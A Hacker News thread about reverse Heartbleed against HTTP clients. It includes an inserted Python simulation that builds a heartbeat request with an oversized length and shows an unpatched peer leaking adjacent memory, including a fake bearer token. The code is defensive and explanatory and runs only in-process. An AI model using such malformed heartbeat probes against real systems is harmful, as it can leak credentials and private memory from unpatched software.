

What clients are proven to be vulnerable to Heartbleed? - Angostura
http://security.stackexchange.com/questions/55249/what-clients-are-proven-to-be-vulnerable-to-heartbleed

======
patio11
This is _particularly_ of interest to those of us who e.g. have a web
application with an embedded HTTP client for e.g. processing web hooks,
hitting APIs, downloading image files for avatars, etc. If your application
can be coerced into fetching either a) an attacker-chosen URL or b) _any_ HTTP
URL, you can be sent to a malicious server which heartbleeds you. (If the
attacker can specify the URL it's trivial, if you get any HTTP URL then the
attacker can use a privileged vantage point to MITM the HTTP connection then
301 redirect you to a better URL.) Can you imagine any freed memory in your
appserver's process which you wouldn't want an attacker to have? Good answer!

------
bradleybuda
We _just_ pushed out a tester (we wanted it for ourselves and decided to make
it available to others):
[https://reverseheartbleed.com/](https://reverseheartbleed.com/)

Thanks to @patio11 and others for pointing out the 'other half' of this
vulnerability and motivating us to get a quick fix out.
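
The exchange patio11 describes, and the decision a tester like the one bradleybuda links has to make, as an added example in Python. This is not code from the thread or from reverseheartbleed.com: it models both ends of the heartbeat exchange in one process with no network or TLS library, using the record and message layouts from RFC 5246 and RFC 6520. Assumptions: the ClientHello, the record version (TLS 1.1) and the "adjacent process memory" are all constructed for the example, and `patched_peer` reproduces only the length check from the OpenSSL 1.0.1g fix, not the rest of the heartbeat code path.

```python
"""Toy model of a reverse-Heartbleed probe: malicious server side vs. the client.

Added example, not code from the thread or from reverseheartbleed.com.
Record and message layouts follow RFC 5246 / RFC 6520; both peers are
simulated in-process, so nothing here touches a socket or a TLS library.
"""
import struct
from typing import Optional

CONTENT_HANDSHAKE = 22
CONTENT_HEARTBEAT = 24
HANDSHAKE_CLIENT_HELLO = 1
EXT_HEARTBEAT = 15            # RFC 6520 extension type
HB_REQUEST, HB_RESPONSE = 1, 2
TLS_VERSION = b"\x03\x02"     # assumption: TLS 1.1 record version throughout
PADDING = b"\x00" * 16        # RFC 6520 requires at least 16 bytes of padding


def build_client_hello(offer_heartbeat: bool) -> bytes:
    """Constructed minimal ClientHello: enough structure to parse, nothing more."""
    exts = b""
    if offer_heartbeat:
        # extension body is one byte: heartbeat_mode = peer_allowed_to_send (1)
        exts += struct.pack("!HH", EXT_HEARTBEAT, 1) + b"\x01"
    body = (TLS_VERSION + b"\x11" * 32               # client_version, random
            + b"\x00"                                # empty session id
            + struct.pack("!H", 2) + b"\x00\x2f"     # one cipher suite
            + b"\x01\x00"                            # null compression only
            + struct.pack("!H", len(exts)) + exts)
    handshake = bytes([HANDSHAKE_CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([CONTENT_HANDSHAKE]) + TLS_VERSION + struct.pack("!H", len(handshake)) + handshake


def client_offers_heartbeat(record: bytes) -> bool:
    """A client can only be probed if its ClientHello carries the heartbeat extension."""
    ctype, _ver, rlen = struct.unpack("!B2sH", record[:5])
    hs = record[5:5 + rlen]
    if ctype != CONTENT_HANDSHAKE or hs[0] != HANDSHAKE_CLIENT_HELLO:
        return False
    p = 4 + 2 + 32                                   # handshake header, version, random
    p += 1 + hs[p]                                   # session id
    p += 2 + struct.unpack("!H", hs[p:p + 2])[0]     # cipher suites
    p += 1 + hs[p]                                   # compression methods
    if p >= len(hs):
        return False                                 # no extensions block at all
    end = p + 2 + struct.unpack("!H", hs[p:p + 2])[0]
    p += 2
    while p + 4 <= end:
        etype, elen = struct.unpack("!HH", hs[p:p + 4])
        if etype == EXT_HEARTBEAT:
            return True
        p += 4 + elen
    return False


def build_heartbeat_request(payload: bytes, claimed_len: int) -> bytes:
    """Heartbeat request record; claimed_len > len(payload) is the Heartbleed trigger."""
    msg = bytes([HB_REQUEST]) + struct.pack("!H", claimed_len) + payload + PADDING
    return bytes([CONTENT_HEARTBEAT]) + TLS_VERSION + struct.pack("!H", len(msg)) + msg


def _echo(msg: bytes, claimed: int, process_memory: bytes) -> bytes:
    # process_memory stands in for whatever sits after the record in the heap
    # (constructed for the example). Reading past the record is the bug.
    heap = msg[3:] + process_memory
    echoed = heap[:claimed]
    resp = bytes([HB_RESPONSE]) + struct.pack("!H", claimed) + echoed + PADDING
    return bytes([CONTENT_HEARTBEAT]) + TLS_VERSION + struct.pack("!H", len(resp)) + resp


def vulnerable_peer(record: bytes, process_memory: bytes) -> Optional[bytes]:
    """Unpatched behaviour: trust payload_length and copy that many bytes back."""
    msg = record[5:]
    if record[0] != CONTENT_HEARTBEAT or msg[0] != HB_REQUEST:
        return None
    claimed = struct.unpack("!H", msg[1:3])[0]
    return _echo(msg, claimed, process_memory)       # no bounds check: over-read


def patched_peer(record: bytes, process_memory: bytes) -> Optional[bytes]:
    """1.0.1g-style fix: drop requests whose claimed length does not fit the record."""
    msg = record[5:]
    if record[0] != CONTENT_HEARTBEAT or msg[0] != HB_REQUEST:
        return None
    claimed = struct.unpack("!H", msg[1:3])[0]
    if 1 + 2 + claimed + 16 > len(msg):
        return None                                  # silently discarded, no reply
    return _echo(msg, claimed, process_memory)       # bounds hold, echo stays inside msg


def analyse_response(response: Optional[bytes], sent_payload: bytes) -> dict:
    """Tester verdict: silence or an exact echo is fine, extra bytes mean a leak."""
    if response is None or response[0] != CONTENT_HEARTBEAT or response[5] != HB_RESPONSE:
        return {"vulnerable": False, "leaked": b""}
    msg = response[5:]
    returned_len = struct.unpack("!H", msg[1:3])[0]
    leaked = msg[3:3 + returned_len][len(sent_payload):]
    return {"vulnerable": len(leaked) > 0, "leaked": leaked}


if __name__ == "__main__":
    hello = build_client_hello(offer_heartbeat=True)
    print("client offers heartbeat:", client_offers_heartbeat(hello))
    memory = b"Authorization: Bearer s3cr3t-api-token\r\n"   # constructed heap contents
    # claim payload + our own 16 bytes of padding + everything after the record
    probe = build_heartbeat_request(b"ping", claimed_len=4 + len(PADDING) + len(memory))
    for name, peer in (("unpatched", vulnerable_peer), ("patched", patched_peer)):
        print(name, analyse_response(peer(probe, memory), b"ping"))
```

The first 16 leaked bytes are the request's own padding, which is still inside the record; what follows is the constructed "memory" beyond it, which is the part an attacker-controlled server would actually want from an outbound HTTP client. A patched peer answers a well-formed request normally but never answers the oversized one, so a tester has to treat a timeout, not just a short reply, as "not vulnerable".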

------
beachstartup
Yes, don't forget to restart your applications after updating OpenSSL
libraries. This includes clients!

